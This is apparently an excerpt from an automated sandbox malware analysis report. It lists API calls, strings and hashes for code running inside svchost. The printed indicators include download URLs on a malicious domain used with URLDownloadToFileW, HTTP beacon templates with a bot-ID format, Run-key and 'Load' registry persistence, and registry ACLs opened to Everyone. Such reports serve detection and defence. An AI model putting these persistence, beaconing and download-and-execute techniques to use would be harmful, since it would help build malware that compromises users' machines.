RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00060006,00000000,?,00000000,?,?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000), ref: 00021C68
RegSetValueExW.ADVAPI32(?,00000000,00000001,?,?,?,00000000,00000000,00000000,00060006,00000000,?,00000000,?,?,00000004), ref: 00021C80
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KRWD;;;WD),00000001,?,00000000), ref: 00021C92
RegSetKeySecurity.ADVAPI32(?,00000004,?,D:(A;;KRWD;;;WD),00000001,?,00000000,?,00000000,00000001,?,?,?,00000000,00000000,00000000), ref: 00021C9F
RegCloseKey.ADVAPI32(?,?,00000004,?,D:(A;;KRWD;;;WD),00000001,?,00000000,?,00000000,00000001,?,?,?,00000000,00000000), ref: 00021CA7
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00021CBD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021CE0

Strings

\Temp, xrefs: 00021A3D
%s\ms%s.%s, xrefs: 00021AD4
D:(A;;KRWD;;;WD), xrefs: 00021C8D
D:(A;;KA;;;WD), xrefs: 00021C28
\Local Settings, xrefs: 00021A26

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: CreateFile$Security$Close$DescriptorVirtual$FreeHandle$AllocConvertDirectoryHeapStringTimelstrcatlstrcpy$AllocateCountEnvironmentExpandNamePathRandomReadShortStringsTickValueWritelstrcmpilstrlenwsprintf
String ID: %s\ms%s.%s$D:(A;;KA;;;WD)$D:(A;;KRWD;;;WD)$\Local Settings$\Temp
API String ID: 3624018530-1859796181
Opcode ID: 49afd6e5a0ef94dcd24a16e57757b0aa5e90aeef25b32487033e61c2aa11a375
Instruction ID: e6252c1eb0c35e1fd87d81646474356fa797e514c13ed454e024a5073afa759e
Opcode Fuzzy Hash: 49afd6e5a0ef94dcd24a16e57757b0aa5e90aeef25b32487033e61c2aa11a375
Instruction Fuzzy Hash: D8811F71950219BEEF61ABD0ED43FEEBA79EB04700F204175B610750E2EBB56F109B64

Uniqueness

Uniqueness Score: -1.00%

Function 00020973 Relevance: 54.4, APIs: 28, Strings: 3, Instructions: 161
nativethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,1BC558EA), ref: 0002099D

Part of subcall function 00020550: GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,3A707474), ref: 00020585

GetVersionExA.KERNEL32(00000094), ref: 000209D6
NtQueryInformationProcess.NTDLL(000000FF,0000001A,00000000,00000004,00000000), ref: 00020A00
NtDelayExecution.NTDLL(00000000,FE363C80), ref: 00020A33
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A46
GetEnvironmentVariableW.KERNEL32(src,?,00008000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A63
SetEnvironmentVariableW.KERNEL32(src,00000000,src,?,00008000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A77
GetShortPathNameW.KERNEL32(?,?,00008000), ref: 00020A87
wsprintfA.USER32 ref: 00020AA0
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00020AB0
GetLastError.KERNEL32(00000000,00000000,?), ref: 00020ABA
SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00000000,?), ref: 00020ADA
DeleteFileW.KERNEL32(?,?,00000080,?,00000000,00000000,?), ref: 00020AE2
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000080,?,00000000,00000000,?), ref: 00020AF1
WSAStartup.WS2_32(00000202,?), ref: 00020B02
CreateThread.KERNEL32(00000000,00000000,Function_00000776,00000000,00000000,00000000), ref: 00020B13
CloseHandle.KERNEL32(00000000), ref: 00020B19
CreateThread.KERNEL32(00000000,00000000,Function_00000846,00000000,00000000,00000000), ref: 00020B2A
CloseHandle.KERNEL32(00000000), ref: 00020B30
CreateThread.KERNEL32(00000000,00000000,Function_00000590,00000000,00000000,00000000), ref: 00020B4D
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00020B59
CloseHandle.KERNEL32(00000000), ref: 00020B5E
NtDelayExecution.NTDLL(00000000,?), ref: 00020B80
SetFileAttributesW.KERNEL32(?,00000080,00000000,00000000,?), ref: 00020B8F
DeleteFileW.KERNEL32(?,?,00000080,00000000,00000000,?), ref: 00020B97
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000080,00000000,00000000,?), ref: 00020BA6
ExitProcess.KERNEL32(00000000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020BAD
SetErrorMode.KERNEL32(00008007,?,00000000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020BBA

Strings

%lu, xrefs: 00020A97
src, xrefs: 00020A72
src, xrefs: 00020A5E

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: CreateFile$CloseHandleProcessThreadVirtual$AttributesDelayDeleteEnvironmentErrorExecutionFreeInformationVariable$AllocExitHeapLastModeMutexNameObjectPathQueryShortSingleStartupVersionVolumeWaitwsprintf
String ID: %lu$src$src
API String ID: 4156576649-1697788582
Opcode ID: fd03638f55a1054701fe20a09e0933065fc1fb400533e1e0722e263bdea9c015
Instruction ID: 978f0be34db3e60213f59978daec0b538318f509b27ab584c3bea470ebe3d314
Opcode Fuzzy Hash: fd03638f55a1054701fe20a09e0933065fc1fb400533e1e0722e263bdea9c015
Instruction Fuzzy Hash: 8E5188B0A40324FEEB64FBE0ED47FEEB678AF04700F104565B614A61D3DBB85A049B65

Uniqueness

Uniqueness Score: -1.00%

Function 001E1430 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 218
registryfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 001E145F
_memset.LIBCMT ref: 001E147A
_memset.LIBCMT ref: 001E1495
GetTempPathW.KERNEL32(00000104,?), ref: 001E14A9
GetTempFileNameW.KERNELBASE(?,001EACE4,00000000,?,?,?,?,?,?,?,?,00000000), ref: 001E14E1
RegOpenKeyExW.KERNEL32 ref: 001E1530
RegQueryValueExW.KERNEL32(?,IMAGE_FILE_HEADER,00000000,00000000,00000000,00000000), ref: 001E1546
RegSetValueExW.KERNEL32 ref: 001E1562
RegCloseKey.ADVAPI32(?), ref: 001E156F
URLDownloadToFileW.URLMON(00000000,?,?,00000010,00000000), ref: 001E1589
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15A0
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15B6
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15C3
CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 001E15E7
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15FF
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 001E1611
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 001E162B
RegOpenKeyExW.ADVAPI32 ref: 001E166C
RegSetValueExW.ADVAPI32 ref: 001E1683
RegCloseKey.ADVAPI32(?), ref: 001E1690
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E169E
CloseHandle.KERNEL32(?), ref: 001E16AB
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16BE
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16D0
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16DD

Strings

http://pe.suckmycocklameavindustry.in/, xrefs: 001E14E7
IMAGE_FILE_HEADER, xrefs: 001E1544, 001E1560, 001E1681
::di, xrefs: 001E1631
Software, xrefs: 001E1526, 001E1662

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: File$Delete$CloseValue_memset$AttributesOpenTempVirtual$AllocCreateDownloadFreeHandleNamePathQueryReadSize
String ID: ::di$IMAGE_FILE_HEADER$Software$http://pe.suckmycocklameavindustry.in/
API String ID: 3533175232-3580285602
Opcode ID: a81183b458f3ba9d1c78c6234ce3a582ff3b0d520fe918218359e1515a2f0d3b
Instruction ID: c12fc107719c2797698f017e6ecc4900bdef0cc8e4eb076306cccd38c004ba5f
Opcode Fuzzy Hash: a81183b458f3ba9d1c78c6234ce3a582ff3b0d520fe918218359e1515a2f0d3b
Instruction Fuzzy Hash: 8C71BBB1A40758BBEB20DBA1DC49FEE737DEF88710F404599F609AA1C1D7719E848B60

Uniqueness

Uniqueness Score: -1.00%

Function 001E10D0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 150
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClassW.USER32 ref: 001E1124

Strings

http://sc.suckmycocklameavindustry.in/, xrefs: 001E1173
0x7FFFFFFF, xrefs: 001E1182
http://pe.suckmycocklameavindustry.in/, xrefs: 001E1157
#usb# , xrefs: 001E111C, 001E1232, 001E1237
DOS_STUB, xrefs: 001E116E
{xu, xrefs: 001E1261
http://img.suckmycocklameavindustry.in/, xrefs: 001E118C
IMAGE_FILE_HEADER, xrefs: 001E1152
ImageBase, xrefs: 001E1187

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: ClassRegister
String ID: #usb# $0x7FFFFFFF$DOS_STUB$IMAGE_FILE_HEADER$ImageBase$http://img.suckmycocklameavindustry.in/$http://pe.suckmycocklameavindustry.in/$http://sc.suckmycocklameavindustry.in/${xu
API String ID: 2764894006-4219322296
Opcode ID: 0e3d26357070633fe15c0a68a71c677059d31068bcf3d62ba9262c2b7ee69ce4
Instruction ID: 63905267aaf4c4ecec3e05fc67c584cda324f69f6774af9074f4eacc167207d0
Opcode Fuzzy Hash: 0e3d26357070633fe15c0a68a71c677059d31068bcf3d62ba9262c2b7ee69ce4
Instruction Fuzzy Hash: F541C77160478167C310AFA6AD45AAFB7E9EFD4B10F40092EFA459B281DBB09941C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00021474 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000213C9: DnsQuery_A.DNSAPI(?,00000001,00000000,00000000,?,00000000), ref: 000213E1
Part of subcall function 000213C9: DnsRecordListFree.DNSAPI(?,00000001), ref: 0002140A

socket.WS2_32(00000002,00000001,00000000), ref: 000214CF
connect.WS2_32(?,?,00000010), ref: 000214E5
getsockname.WS2_32(?,?,?), ref: 00021512
shutdown.WS2_32(?,00000002), ref: 00021522
closesocket.WS2_32(?), ref: 0002152A

Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
Part of subcall function 000211EC: DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
Part of subcall function 000211EC: socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
Part of subcall function 000211EC: WSACreateEvent.WS2_32 ref: 000212C1
Part of subcall function 000211EC: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
Part of subcall function 000211EC: sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
Part of subcall function 000211EC: WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
Part of subcall function 000211EC: recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E

Strings

www.update.microsoft.com, xrefs: 00021494, 000214A5

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: AllocateByteCharEventHeapMultiWidesocket$Buffer_CreateFreeListObjectQuery_QuestionRecordSelectSingleWaitWriteclosesocketconnectgetsocknamerecvfromsendtoshutdown
String ID: www.update.microsoft.com
API String ID: 2761874391-1705189816
Opcode ID: a8f424bb0f59e477e0702b154a7d5597803800d1b3ebef582881c5649f559ce8
Instruction ID: 5eff0d5360ddb47700480bd5c9b62afc755c512c18089e12253205f9ca0e93cc
Opcode Fuzzy Hash: a8f424bb0f59e477e0702b154a7d5597803800d1b3ebef582881c5649f559ce8
Instruction Fuzzy Hash: 8B118E70D0022EEADF11ABE4E842BEEBAB9EF14310F404025E554B6192E3718A498BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00081284 Relevance: 1.6, APIs: 1, Instructions: 107memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000040,?,940959B9,?,E4105E5C), ref: 000812F9

Memory Dump Source

Source File: 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_80000_svchost.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
Instruction ID: d04b46f46cbdd1d0d10300c164776970914407512efda5b239b15703850e1ef2
Opcode Fuzzy Hash: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
Instruction Fuzzy Hash: 81412F71E0060AAFDF51EFA5CC81AEEB7B9FF04310F148164A950AB296D774EA52CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00020550 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,3A707474), ref: 00020585

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 6423bffbeebb44c7b3fb064871ea960c82787149df9caf2e4cc1b6f6c38ca714
Instruction ID: bdd2887277a7f0a043e83c0c0ab10f77786c33b5b3ab250f4ba778d4526d5bac
Opcode Fuzzy Hash: 6423bffbeebb44c7b3fb064871ea960c82787149df9caf2e4cc1b6f6c38ca714
Instruction Fuzzy Hash: 85E065B1520244BFDB05CB94CCC6DEAB7BCFB08210B0482A9E9129B242E270FE008630

Uniqueness

Uniqueness Score: -1.00%

Function 00021535 Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 215
memorynetworkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000), ref: 00021552
RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
socket.WS2_32(00000002,00000001,00000006), ref: 00021610
connect.WS2_32(?,00000002,00000010), ref: 0002162A
RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
wsprintfA.USER32 ref: 0002166B
wsprintfA.USER32 ref: 00021683
send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC
recv.WS2_32(?,00000000,-00000002,00000000), ref: 0002171E
RtlAllocateHeap.NTDLL(00000008,00000004,?), ref: 0002173E
recv.WS2_32(?,00000000,00000400,00000000), ref: 00021757
RtlSizeHeap.NTDLL(00000000,00000000,?), ref: 00021772
RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,00000000), ref: 00021788
HeapFree.KERNEL32(00000000,00000000,?), ref: 000217AD
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 000217C4
shutdown.WS2_32(?,00000002), ref: 000217CE
closesocket.WS2_32(?), ref: 000217D6
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 000217E6

Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
Part of subcall function 000211EC: DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
Part of subcall function 000211EC: socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
Part of subcall function 000211EC: WSACreateEvent.WS2_32 ref: 000212C1
Part of subcall function 000211EC: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
Part of subcall function 000211EC: sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
Part of subcall function 000211EC: WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
Part of subcall function 000211EC: recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E

Strings

p://, xrefs: 0002157C
200, xrefs: 000216D5
POST /%s HTTP/1.1Host: %sUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: %dConnection: close, xrefs: 00021663
GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0Connection: close, xrefs: 0002167B

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Heap$Allocate$Freerecv$ByteCharEventMultiWidesendsocketwsprintf$Buffer_CreateObjectQuestionSelectSingleSizeWaitWriteclosesocketconnectlstrcpylstrlenrecvfromsendtoshutdown
String ID: 200$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0Connection: close$POST /%s HTTP/1.1Host: %sUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: %dConnection: close$p://
API String ID: 1283243819-650216524
Opcode ID: 80c83bc40eb833485bd5528873149ba04c8dd4a30aeffe2e562c0e19deed8157
Instruction ID: ca7982863e95662c3e36eafd4c0f62391f95dd883b8f891a2fcf2e9d3333f067
Opcode Fuzzy Hash: 80c83bc40eb833485bd5528873149ba04c8dd4a30aeffe2e562c0e19deed8157
Instruction Fuzzy Hash: 8871A13090422AEADF319FA0ED42BEE7AB5BF24300F144164FA11B61B2D7769E11DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00020590 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 221
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000064), ref: 000205A3
wsprintfA.USER32 ref: 000205E5
lstrlen.KERNEL32(00000000), ref: 00020616
RtlSizeHeap.NTDLL(00000000,?,00000000), ref: 0002062B
RtlReAllocateHeap.NTDLL(00000000,?,00000000,?), ref: 00020643
lstrcat.KERNEL32(?,?), ref: 00020655
lstrlen.KERNEL32(?), ref: 0002065F
RtlAllocateHeap.NTDLL(00000000,00000000,00020454), ref: 00020684
lstrlen.KERNEL32(?,?,?,?,00000000,00000000,00020454,00000020,?,?,?), ref: 000206A5
RtlSizeHeap.NTDLL(00000000,?,00000000), ref: 000206DC
HeapFree.KERNEL32(00000000,?), ref: 00020733
HeapFree.KERNEL32(00000000,?,00000000), ref: 00020745
HeapFree.KERNEL32(00000000,?,?), ref: 0002075A
HeapFree.KERNEL32(00000000,?,00000000), ref: 0002076A
RtlExitUserThread.NTDLL(00000000), ref: 00020771
RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002079D
RegEnumValueW.ADVAPI32(?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 000207C9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000), ref: 000207E5
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000,?,00000020,00000000,00000000), ref: 0002080A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000), ref: 00020825
RegCloseKey.ADVAPI32(?,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?), ref: 00020835
RtlExitUserThread.NTDLL(00000000,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002083C

Strings

id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu, xrefs: 000205DD
software\microsoft, xrefs: 00020782, 00020796
, xrefs: 000207AA

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Heap$Free$Allocatelstrlen$ExitSizeThreadUserValueVirtual$AllocCloseCreateEnumQuerylstrcatwsprintf
String ID: $id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu$software\microsoft
API String ID: 3265116144-1820778675
Opcode ID: b30dfb967b1a2b7197b6dd8df2ac0f3d39355cffbeae54138017a88ea3bd435b
Instruction ID: f09b47422ae7a81f46a3ae03e59903e78e389f5283b2eb324dc41a7052b188fa
Opcode Fuzzy Hash: b30dfb967b1a2b7197b6dd8df2ac0f3d39355cffbeae54138017a88ea3bd435b
Instruction Fuzzy Hash: 6B714271900225FEEF61ABE0ED92FEE7A79FB14700F204164B600B50A3DB759A51DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00021897 Relevance: 38.6, APIs: 7, Strings: 15, Instructions: 68
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000040), ref: 000218A7
ConvertStringSidToSidA.ADVAPI32(S-1-5-32-544,?), ref: 000218C2
CheckTokenMembership.ADVAPI32(00000000,?,000230F8,00000000,00000040), ref: 000218D5
LocalFree.KERNEL32(?,00000000,?,000230F8,00000000,00000040), ref: 000218DD
lstrcpyW.KERNEL32(Load,00000000), ref: 00021914
wsprintfW.USER32 ref: 0002194F
GetTickCount.KERNEL32(Load,00000000,00000040), ref: 00021957

Strings

com, xrefs: 0002196C
pif, xrefs: 00021988
software\microsoft\windows nt\currentversion\windows, xrefs: 000218FF
software\microsoft\windows\currentversion\Policies\Explorer\Run, xrefs: 0002192F
Load, xrefs: 00021909
exe, xrefs: 0002195E
com, xrefs: 000219B2
%allusersprofile%, xrefs: 00021925
cmd, xrefs: 00021996
scr, xrefs: 0002197A
bat, xrefs: 000219A4
exe, xrefs: 000219C0
S-1-5-32-544, xrefs: 000218BD
%lu, xrefs: 00021944
%userprofile%, xrefs: 000218F5

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: AllocateCheckConvertCountFreeHeapLocalMembershipStringTickTokenlstrcpywsprintf
String ID: %allusersprofile%$%lu$%userprofile%$Load$S-1-5-32-544$bat$cmd$com$com$exe$exe$pif$scr$software\microsoft\windows nt\currentversion\windows$software\microsoft\windows\currentversion\Policies\Explorer\Run
API String ID: 2048046775-1591313489
Opcode ID: 6edd1678e4c6b75253428dcb76e1de57de34ac8a7491860ea0b4972191eea149
Instruction ID: 945564738f0592ae5b826c65c8337ac2077e6e0c7e2e4cd104fbb78bcab7d531
Opcode Fuzzy Hash: 6edd1678e4c6b75253428dcb76e1de57de34ac8a7491860ea0b4972191eea149
Instruction Fuzzy Hash: FB219070040325EAF7759B88FC2E6E43BE1A321308B304526D9946A173D7FC47ABCB84

Uniqueness

Uniqueness Score: -1.00%

Function 00020846 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 94
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00020862
ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 0002087F
SetCurrentDirectoryW.KERNEL32(?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020887
lstrcpy.KERNEL32(?,software\microsoft), ref: 00020896
RegOpenKeyExA.ADVAPI32(?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 000208AF
RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,00020019,?,?,%allusersprofile%,?,00008000), ref: 000208ED
LoadLibraryW.KERNEL32(?), ref: 00020907
GetProcAddress.KERNEL32(?,?,?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,?,0000001F,00000000,00000000), ref: 0002092B
RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,00020019,?,?,%allusersprofile%,?), ref: 0002093E
GetSystemDirectoryW.KERNEL32(?,00008000), ref: 0002094B
SetCurrentDirectoryW.KERNEL32(?,?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020953
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020962
RtlExitUserThread.NTDLL(00000000,00000000,00008000,00001000,00000004), ref: 00020969

Strings

%allusersprofile%, xrefs: 0002087A
0, xrefs: 000208C3
software\microsoft, xrefs: 0002088C, 00020892

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Directory$CurrentVirtual$AddressAllocCloseEnumEnvironmentExitExpandFreeLibraryLoadOpenProcStringsSystemThreadUserValuelstrcpy
String ID: %allusersprofile%$0$software\microsoft
API String ID: 1099496884-2452022100
Opcode ID: 74fc7717356dcc51d53d622bfe86d268f7e3befb8305d93e95ccad0985603c93
Instruction ID: 9e865700be21dc6c3e78602b7619125e8dbcb6cd6b58808818b57b83d987b6ea
Opcode Fuzzy Hash: 74fc7717356dcc51d53d622bfe86d268f7e3befb8305d93e95ccad0985603c93
Instruction Fuzzy Hash: A631097190032ABAEF61ABD0ED42BEEBBBDAF04300F104071B615B60A3DB759A54DF50

Uniqueness

Uniqueness Score: -1.00%

Function 000211EC Relevance: 25.6, APIs: 17, Instructions: 140
memorynetworksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
WSACreateEvent.WS2_32 ref: 000212C1
WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E
